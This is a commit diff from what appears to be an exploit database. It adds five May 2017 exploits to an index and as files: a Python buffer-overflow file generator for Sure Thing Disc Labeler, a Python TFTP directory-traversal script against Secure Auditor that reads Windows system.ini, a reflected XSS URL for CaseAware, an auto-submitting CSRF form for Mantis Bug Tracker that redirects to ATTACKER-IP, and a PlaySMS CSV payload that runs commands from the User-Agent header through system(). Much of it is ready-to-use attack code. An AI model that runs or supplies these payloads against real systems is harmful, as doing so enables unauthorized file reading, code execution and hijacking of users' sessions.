DB: 2017-05-22
5 new exploits Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC) Secure Auditor 3.0 - Directory Traversal KMCIS CaseAware - Cross-Site Scripting Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery PlaySMs 1.4 - 'import.php' Remote Code Execution
This commit is contained in:
parent
df07287e80
commit
6351914249
6 changed files with 401 additions and 0 deletions
|
@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port
|
|||
42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0
|
||||
42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0
|
||||
42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0
|
||||
42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port
|
|||
42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80
|
||||
42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
|
||||
42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
|
||||
42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port
|
|||
42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0
|
||||
42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80
|
||||
42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
|
||||
42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
|
||||
42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
|
||||
42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
27
platforms/php/webapps/42042.txt
Executable file
27
platforms/php/webapps/42042.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: CaseAware Cross Site Scripting Vulnerability
|
||||
# Date: 20th May 2017
|
||||
# Exploit Author: justpentest
|
||||
# Vendor Homepage: https://caseaware.com/
|
||||
# Version: All the versions
|
||||
# Contact: transform2secure@gmail.com
|
||||
# CVE : 2017-5631
|
||||
|
||||
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
|
||||
|
||||
1) Description:
|
||||
An issue with respect to input sanitization was discovered in KMCIS
|
||||
CaseAware. Reflected cross site scripting is present in the user parameter
|
||||
(i.e., "usr") that is transmitted in the login.php query string. So
|
||||
bascially username parameter is vulnerable to XSS.
|
||||
|
||||
2) Exploit:
|
||||
|
||||
https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
|
||||
HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
|
||||
----------------------------------------------------------------------------------------
|
||||
|
||||
3) References:
|
||||
|
||||
https://www.openbugbounty.org/incidents/228262/
|
||||
https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
|
||||
|
109
platforms/php/webapps/42043.txt
Executable file
109
platforms/php/webapps/42043.txt
Executable file
|
@ -0,0 +1,109 @@
|
|||
[+] Credits: John Page a.k.a hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
================
|
||||
www.mantisbt.org
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
=========
|
||||
Mantis Bug Tracker
|
||||
1.3.10 / v2.3.0
|
||||
|
||||
|
||||
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
========================
|
||||
CSRF Permalink Injection
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-7620
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.
|
||||
|
||||
Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
|
||||
Line: 270
|
||||
|
||||
# Check for URL's pointing to other domains
|
||||
|
||||
if( 0 == $t_type || empty( $t_matches['script'] ) ||
|
||||
|
||||
3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
|
||||
|
||||
|
||||
|
||||
return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
# Start extracting regex matches
|
||||
|
||||
$t_script = $t_matches['script'];
|
||||
$t_script_path = $t_matches['path'];
|
||||
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
=============
|
||||
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
OR
|
||||
|
||||
<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: April 9, 2017
|
||||
Vendor Release Fix: May 15, 2017
|
||||
Vendor Disclosed: May 20, 2017
|
||||
May 20, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
128
platforms/php/webapps/42044.txt
Executable file
128
platforms/php/webapps/42044.txt
Executable file
|
@ -0,0 +1,128 @@
|
|||
# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php
|
||||
# Date: 21-05-2017
|
||||
# Software Link: https://playsms.org/download/
|
||||
# Version: 1.4
|
||||
# Exploit Author: Touhid M.Shaikh
|
||||
# Contact: http://twitter.com/touhidshaikh22
|
||||
# Website: http://touhidshaikh.com/
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
Code Execution using import.php
|
||||
|
||||
We know import.php accept file and just read content
|
||||
not stored in server. But when we stored payload in our backdoor.csv
|
||||
and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly .
|
||||
|
||||
In My case i stored my vulnerable code in my backdoor.csv files's Name field .
|
||||
|
||||
But There is one problem in execution. Its only execute in built function and variable which is used in application.
|
||||
|
||||
That why the server not execute our payload directly. Now i Use "<?php $a=$_SERVER['HTTP_USER_AGENT']; system($a); ?>" in name field and change our user agent to any command which u want to execute command. Bcz it not execute <?php system("id")?> directly .
|
||||
|
||||
Example of my backdoor.csv file content
|
||||
----------------------MY FILE CONTENT------------------------------------
|
||||
Name Mobile Email Group code Tags
|
||||
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?> 22
|
||||
|
||||
--------------------MY FILE CONTENT END HERE-------------------------------
|
||||
|
||||
|
||||
|
||||
For More Details : www.touhidshaikh.com/blog/
|
||||
|
||||
For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Login as regular user (created user using index.php?app=main&inc=core_auth&route=register):
|
||||
|
||||
Go to :
|
||||
http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
|
||||
|
||||
|
||||
And Upload my malicious File.(backdoor.csv)
|
||||
and change our User agent.
|
||||
|
||||
|
||||
This is Form For Upload Phonebook.
|
||||
----------------------Form for upload CSV file ----------------------
|
||||
<form action=\"index.php?app=main&inc=feature_phonebook&route=import&op=import\" enctype=\"multipart/form-data\" method=POST>
|
||||
" . _CSRF_FORM_ . "
|
||||
<p>" . _('Please select CSV file for phonebook entries') . "</p>
|
||||
<p><input type=\"file\" name=\"fnpb\"></p>
|
||||
<p class=text-info>" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "</p>
|
||||
<p><input type=\"submit\" value=\"" . _('Import') . "\" class=\"button\"></p>
|
||||
</form>
|
||||
------------------------------Form ends ---------------------------
|
||||
|
||||
|
||||
|
||||
-------------Read Content and Display Content-----------------------
|
||||
|
||||
case "import":
|
||||
$fnpb = $_FILES['fnpb'];
|
||||
$fnpb_tmpname = $_FILES['fnpb']['tmp_name'];
|
||||
$content = "
|
||||
<h2>" . _('Phonebook') . "</h2>
|
||||
<h3>" . _('Import confirmation') . "</h3>
|
||||
<div class=table-responsive>
|
||||
<table class=playsms-table-list>
|
||||
<thead><tr>
|
||||
<th width=\"5%\">*</th>
|
||||
<th width=\"20%\">" . _('Name') . "</th>
|
||||
<th width=\"20%\">" . _('Mobile') . "</th>
|
||||
<th width=\"25%\">" . _('Email') . "</th>
|
||||
<th width=\"15%\">" . _('Group code') . "</th>
|
||||
<th width=\"15%\">" . _('Tags') . "</th>
|
||||
</tr></thead><tbody>";
|
||||
if (file_exists($fnpb_tmpname)) {
|
||||
$session_import = 'phonebook_' . _PID_;
|
||||
unset($_SESSION['tmp'][$session_import]);
|
||||
ini_set('auto_detect_line_endings', TRUE);
|
||||
if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) {
|
||||
$i = 0;
|
||||
while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) {
|
||||
if ($i > $phonebook_row_limit) {
|
||||
break;
|
||||
}
|
||||
if ($i > 0) {
|
||||
$contacts[$i] = $c_contact;
|
||||
}
|
||||
$i++;
|
||||
}
|
||||
$i = 0;
|
||||
foreach ($contacts as $contact) {
|
||||
$c_gid = phonebook_groupcode2id($uid, $contact[3]);
|
||||
if (!$c_gid) {
|
||||
$contact[3] = '';
|
||||
}
|
||||
$contact[1] = sendsms_getvalidnumber($contact[1]);
|
||||
$contact[4] = phonebook_tags_clean($contact[4]);
|
||||
if ($contact[0] && $contact[1]) {
|
||||
$i++;
|
||||
$content .= "
|
||||
<tr>
|
||||
<td>$i.</td>
|
||||
<td>$contact[0]</td>
|
||||
<td>$contact[1]</td>
|
||||
<td>$contact[2]</td>
|
||||
<td>$contact[3]</td>
|
||||
<td>$contact[4]</td>
|
||||
</tr>";
|
||||
$k = $i - 1;
|
||||
$_SESSION['tmp'][$session_import][$k] = $contact;
|
||||
}
|
||||
}
|
||||
|
||||
------------------------------code ends ---------------------------
|
||||
|
||||
|
||||
Bingoo.....
|
||||
|
||||
|
||||
*------------------My Friends---------------------------*
|
||||
|Pratik K.Tejani, Rehman, Taushif,Charles Babbage |
|
||||
*---------------------------------------------------*
|
33
platforms/windows/dos/42040.py
Executable file
33
platforms/windows/dos/42040.py
Executable file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
|
||||
# Date: 5-19-17
|
||||
# Exploit Author: Chance Johnson (albatross@loftwing.net)
|
||||
# Vendor Homepage: http://www.surething.com/
|
||||
# Software Link: http://www.surething.com/disclabeler
|
||||
# Version: 6.2.138.0
|
||||
# Tested on: Windows 7 x64 / Windows 10
|
||||
#
|
||||
# Usage:
|
||||
# Open the project template generated by this script.
|
||||
# If a readable address is placed in AVread, no exception will be thrown
|
||||
# and a return pointer will be overwritten giving control over EIP when
|
||||
# the function returns.
|
||||
|
||||
header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
|
||||
header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
|
||||
header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
|
||||
header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
|
||||
header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
|
||||
|
||||
junk1 = 'D'*10968
|
||||
EIP = 'A'*4 # Direct RET overwrite
|
||||
junk2 = 'D'*24
|
||||
AVread = 'B'*4 # address of any readable memory
|
||||
junk3 = 'D'*105693
|
||||
|
||||
buf = header + junk1 + EIP + junk2 + AVread + junk3
|
||||
|
||||
print "[+] Creating file with %d bytes..." % len(buf)
|
||||
|
||||
f=open("exp.std",'wb')
|
||||
f.write(buf)
|
||||
f.close()
|
99
platforms/windows/remote/42041.txt
Executable file
99
platforms/windows/remote/42041.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
[+] Credits: John Page aka HYP3RLINX
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
====================
|
||||
www.secure-bytes.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
=====================
|
||||
Secure Auditor - v3.0
|
||||
|
||||
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
|
||||
and Cisco devices.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Directory Traversal
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-9024
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
|
||||
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
|
||||
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
=============
|
||||
import sys,socket
|
||||
|
||||
print 'Secure Auditor v3.0 / Cisco Config Manager'
|
||||
print 'TFTP Directory Traversal Exploit'
|
||||
print 'Read ../../../../Windows/system.ini POC'
|
||||
print 'hyp3rlinx'
|
||||
|
||||
HOST = raw_input("[IP]> ")
|
||||
FILE = '../../../../Windows/system.ini'
|
||||
PORT = 69
|
||||
|
||||
PAYLOAD = "\x00\x01" #TFTP Read
|
||||
PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal
|
||||
PAYLOAD += "netascii\x00" #TFTP Type
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.sendto(PAYLOAD, (HOST, PORT))
|
||||
out = s.recv(1024)
|
||||
s.close()
|
||||
|
||||
print "Victim Data located on : %s " %(HOST)
|
||||
print out.strip()
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
High
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
==================================
|
||||
Vendor Notification: May 10, 2017
|
||||
No replies
|
||||
May 20, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
Loading…
Add table
Reference in a new issue